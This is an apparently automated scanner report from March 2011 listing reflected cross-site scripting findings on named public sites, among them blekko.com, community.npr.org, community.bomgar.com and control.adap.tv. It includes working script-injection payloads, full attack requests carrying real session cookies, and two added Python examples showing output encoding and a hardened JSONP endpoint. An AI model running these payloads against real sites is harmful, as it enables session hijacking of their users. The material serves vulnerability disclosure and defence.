Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aca2"><script>alert(1)</script>a396d432942 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da961"><script>alert(1)</script>aa909b82e8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c26a"><script>alert(1)</script>210543f7078 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:49:45 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 351
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c414"><script>alert(1)</script>a626a591c0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cda3b"><script>alert(1)</script>ce7cb4a1b8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:44:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7029"><script>alert(1)</script>96491854817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 368
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7299"><script>alert(1)</script>2cab2f1c0af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff3e"><script>alert(1)</script>8f270842d1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:45:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a8c1"><script>alert(1)</script>73fad9bf007 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 01:46:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8113"><script>alert(1)</script>008009ecf9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9442e"><script>alert(1)</script>caf55ec555b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7deab"><script>alert(1)</script>3c3c43fbf6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7c76"><script>alert(1)</script>3397761bfb1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f96d9"><script>alert(1)</script>b78bb1c3bd3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6d2b"><script>alert(1)</script>e47bee3f37c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 07 Mar 2011 18:59:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 350
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 3d73f<script>alert(1)</script>63bc5c45e1d was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /autocomplete?query=http%3A%2F%2Fxs+%2Fseo3d73f<script>alert(1)</script>63bc5c45e1d HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2
The value of REST URL parameter 3 is copied into an HTML comment. The payload 96591--><script>alert(1)</script>673695fb9b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 676d8--><a>4f71632b565 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 3 is copied into an HTML comment. The payload 19fe5--><script>alert(1)</script>81ca749855a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into an HTML comment. The payload b1276--><script>alert(1)</script>2f27a7397c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/elbo.ws+/visualizeb1276--><script>alert(1)</script>2f27a7397c8 HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; domainseo-tab=domaincont-2; t=1299508790128; suggestedSlashtagsList=1; sessionid=45305018; fbl=2;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 5c199--><script>alert(1)</script>8d3c8e8979c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fcloudscan.me+/seo5c199--><script>alert(1)</script>8d3c8e8979c HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fcloudscan.us+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; v=3; fbl=2; t=1299508790128
The value of REST URL parameter 3 is copied into an HTML comment. The payload b6468--><script>alert(1)</script>b2125480183 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fcloudscan.us+/seob6468--><script>alert(1)</script>b2125480183 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Fxss.cx+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=3; t=1299508779576
The value of REST URL parameter 3 is copied into an HTML comment. The payload cc0e5--><script>alert(1)</script>557c4487d5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Felbo.ws%2F+/seocc0e5--><script>alert(1)</script>557c4487d5b HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http://elbo.ws/+/visualize8d039--%3E%3Cscript%3Ealert(1)%3C/script%3E23bc12b73c2?&co=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; fbl=2; v=1; suggestedSlashtagsList=1
The value of REST URL parameter 3 is copied into an HTML comment. The payload 2d119--><script>alert(1)</script>cd9b01d6718 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ws/http:%2F%2Fxss.cx+/seo2d119--><script>alert(1)</script>cd9b01d6718 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/http:%2F%2Felbo.ws%2F+/seo
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=45305018; suggestedSlashtagsList=1; fbl=2; v=2; t=1299508761762
The value of REST URL parameter 5 is copied into an HTML comment. The payload 621ab--><script>alert(1)</script>e87cefc468f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload a97a6--><script>alert(1)</script>222caa3f0a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload d4048--><script>alert(1)</script>a9a3a3e2e54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8d039--><script>alert(1)</script>23bc12b73c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46c59<script>alert(1)</script>14300c00191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /46c59<script>alert(1)</script>14300c00191 HTTP/1.1
Host: community.bomgar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Tue, 08 Mar 2011 12:03:23 GMT
Server: Apache
Set-Cookie: swl_bomgar_sess=8a53d406464e7e265306bdfd14ce9b18; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: swl_debug=deleted; expires=Mon, 08-Mar-2010 12:03:23 GMT; httponly
Vary: Accept-Encoding
Content-Length: 239
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /46c59<script>alert(1)</script>14300c00191 was not found on this server.</p>
...[SNIP]...
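The two reflection contexts reported so far, an HTML comment (REST URL parameter 5) and plain text between tags (the community.bomgar.com 404 page), need different fixes, and that difference is the point of the following example. It is added here and is not code from the report or from either application; the scanner payloads are the ones quoted above, the debug comment renderer is a constructed illustration, and the encoders are what a server-side template should apply before echoing the path.

```python
import html
import re

# Scanner payloads quoted in the two findings above.
COMMENT_PAYLOAD = "a97a6--><script>alert(1)</script>222caa3f0a5"
TEXT_PAYLOAD = "46c59<script>alert(1)</script>14300c00191"


def encode_for_text(value):
    """Encoding for the 'plain text between tags' context.

    Entity-encoding the HTML metacharacters is sufficient here: the parser
    cannot open a tag from '&lt;script&gt;'.
    """
    return html.escape(value, quote=True)


def encode_for_comment(value):
    """Encoding for the HTML comment context.

    Entity encoding does nothing inside <!-- ... -->: the parser never decodes
    entities there, but it does end the comment at the first '-->' (and at
    '--!>'). The only robust treatment is to make those sequences impossible,
    so runs of hyphens are collapsed and '>' is dropped. Better still is not
    to write untrusted data into comments at all.
    """
    value = re.sub(r"-{2,}", "-", value)
    return value.replace(">", "")


def comment_breakout(comment_body):
    """True if this comment body would terminate the enclosing comment."""
    return "-->" in comment_body or "--!>" in comment_body


def not_found_page(request_path):
    """A 404 body in the shape of the response above, with the echoed path
    encoded for its context (the original echoed it unmodified)."""
    return (
        "<html><head><title>404 Not Found</title></head><body>"
        "<h1>Not Found</h1>"
        "<p>The requested URL %s was not found on this server.</p>"
        "</body></html>" % encode_for_text(request_path)
    )


def debug_comment(request_path):
    """Constructed example of data written into a comment, as in the
    REST URL parameter 5 findings, with the comment-context encoder."""
    return "<!-- path=%s -->" % encode_for_comment(request_path)


if __name__ == "__main__":
    print(not_found_page("/" + TEXT_PAYLOAD))
    print(debug_comment("/" + COMMENT_PAYLOAD))
    print("breakout after encoding:", comment_breakout(encode_for_comment(COMMENT_PAYLOAD)))
```

The comment case is the one that catches people out: a template engine's default escaping produces `--&gt;`, which the browser does not decode inside a comment, yet the payload above still works because the `--` and `>` it needs were never touched.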
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 853e1<script>alert(1)</script>8247c141a2c was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Commented%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%2C%7B%22DiscoverContentAction%22%3A%7B%22Activity%22%3A%7B%22Activity%22%3A%7B%22Name%22%3A%22Recommended%22%7D%7D%2C%22Age%22%3A2%2C%22ContentType%22%3A%7B%22ContentType%22%3A%7B%22Name%22%3A%22Article%22%7D%7D%2C%22LimitToContributors%22%3A%5B%7B%22UserTier%22%3A%7B%22Name%22%3A%22Standard%22%7D%7D%5D%2C%22MaximumNumberOfDiscoveries%22%3A4%2C%22SearchCategories%22%3A%5B%7B%22Category%22%3A%7B%7D%7D%5D%2C%22SearchSections%22%3A%5B%7B%22Section%22%3A%7B%22Name%22%3A%22All%22%7D%7D%5D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c HTTP/1.1
Host: community.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plckarptnpr=R4181523433; GUID=00072D2E61F00D7544B182A361626364; LE1=j7MTD1+4mf4+31+5; LE2=j7MTD1+4Gc4+31+5; __gads=ID=fcdec54320c1d3ec:T=1299538425:S=ALNI_MZC3MrMfYZgHu4zHMiEHfmLb2rLJQ
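The cb parameter is a JSONP callback name and the finding above is the classic JSONP callback XSS: whatever is supplied is written verbatim at the start of the body, and since the scanner saw the reflection inside an HTML document the response was evidently renderable as a page. The following example is added here and is not NPR's code; the endpoint's real validation and content type are not shown on the page. It builds a JSONP response the way a hardened endpoint would, with a strict callback grammar, a script content type with nosniff, and `</` escaped in the data.

```python
import json
import re

# A JavaScript identifier, optionally dotted, is the only acceptable callback.
# The genuine value from the request above, "RequestBatch.callbacks.daapiCallback0",
# fits; the scanner payload with '<script>' appended does not.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*")


class BadCallback(ValueError):
    pass


def jsonp_response(callback, payload):
    """Return (headers, body) for a JSONP reply that cannot become an HTML page.

    Three independent controls, any one of which breaks the PoC above:
      1. the callback must fully match CALLBACK_RE, so '<script>' never
         reaches the body;
      2. the body is served as application/javascript with nosniff, so a
         browser navigated straight to the URL will not render it as HTML;
      3. '</' inside the JSON is escaped, so the data can never close a
         <script> element if the response is ever inlined.
    """
    if len(callback) > 128 or not CALLBACK_RE.fullmatch(callback):
        raise BadCallback(callback)
    # json.dumps with ensure_ascii (the default) also escapes U+2028/U+2029,
    # which terminate lines in JavaScript but not in JSON.
    data = json.dumps(payload).replace("</", "<\\/")
    body = "/**/%s(%s);" % (callback, data)
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, body


if __name__ == "__main__":
    print(jsonp_response("RequestBatch.callbacks.daapiCallback0", {"Responses": []})[1])
    try:
        jsonp_response("RequestBatch.callbacks.daapiCallback0853e1<script>alert(1)</script>8247c141a2c", {})
    except BadCallback as exc:
        print("rejected:", exc)
```

The leading `/**/` is a conventional defence against content-sniffing of the response as something other than script; the length cap is there because a callback name has no business being long, and it keeps the rejected-input log lines readable.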
The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 98ac4<a>9babd9333ae was submitted in the as parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_ad&as=398ac4<a>9babd9333ae&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the categories request parameter is copied into the HTML document as plain text between tags. The payload 2afc5<a>336ae514bdb was submitted in the categories parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory22afc5<a>336ae514bdb&sessionId=cvcrvf&companionId=main_ad&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="5951245120132160017__TIME__2011-03-05+18%3A07%3A41"; audienceData="{\"v\":2,\"providers\":{\"10\":{\"f\":1301295600,\"e\":1301295600,\"s\":[],\"a\":[]},\"9\":{\"f\":1301900400,\"e\":1301900400,\"s\":[529,528],\"a\":[]}}}"
The value of the companionId request parameter is copied into the HTML document as plain text between tags. The payload bfcf8<a>990b97b465b was submitted in the companionId parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /control?description=Good%20news%20for%20those%20who%20feel%20stuffy%20saying%20'whom.'&zid=mwvideo_autosilent&url=http%3A%2F%2Fvideo.merriam-webster.com%2F0024-whowhom.mp4%3Fec_rate%3D72&duration=111000&height=240&key=mwgames&pageUrl=http%3A%2F%2Fwww.merriam-webster.com%2Fdictionary%2Fxss&width=320&keywords=test%2Cvideo%2Cadaptv&id=0024-whowhom&isTop=true&title=Who%20vs.%20Whom&categories=category1%2Ccategory2&sessionId=cvcrvf&companionId=main_adbfcf8<a>990b97b465b&as=3&eov=fw5il5 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/swf/player.swf
Accept: */*
